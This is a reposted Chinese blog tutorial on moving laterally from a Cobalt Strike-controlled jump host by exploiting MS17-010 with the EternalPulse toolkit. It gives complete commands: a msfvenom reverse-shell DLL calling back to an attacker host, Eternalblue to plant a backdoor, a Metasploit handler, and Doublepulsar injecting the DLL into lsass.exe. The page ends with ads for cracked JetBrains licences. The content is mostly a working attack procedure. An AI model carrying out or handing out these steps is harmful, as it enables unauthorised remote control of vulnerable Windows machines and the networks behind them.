大家好,又见面了,我是你们的朋友全栈君。
1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。
项目地址:https://github.com/TolgaSEZER/EternalPulse
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.128 LPORT=4443 -f dll > x64.dll
2、将dll文件拷贝到EternalPulse工具目录下打包成zip,上传到cobaltstrike已控机器中。
3、查看目标主机是否安装解压缩软件。
shell dir “C:\Program Files”
4、解压缩工具包。
shell “C:\Program Files\7-Zip\7z.exe” x EternalPulse.zip -oc:\EternalPulse
或WinRAR:
“C:\Program Files\WinRAR\rar.exe” x c:\test\EternalPulse.rar c:\test
如果没有解压缩工具,给主机上传单个的rar.exe或7z.exe也可。
5、进入到解压缩后的工具目录。
6、种植后门。
Eternalblue-2.2.0.exe –InConfig Eternalblue-2.2.0.xml –TargetIp 存在17010漏洞的IP –TargetPort 445 –Target WIN72K8R2
(也可以不指定–Target)
7、msf开启监听。
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.3.128
set lport 4443
exploit -j
8、执行Doublepulsar-1.3.1.exe工具远程执行后门
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
9、msf成功接收session。
Ps:实战中应x32.dll,x64.dll都生成一份。使用Doublepulsar.exe的时候要写清参数的位数。dll在其他目录,也应指定好目录,如果没有cd到攻击程序文件夹路径的话,不光exe程序要指定绝对路径,同文件夹下的两个.xml文件也应指定绝对路径。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/130353.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...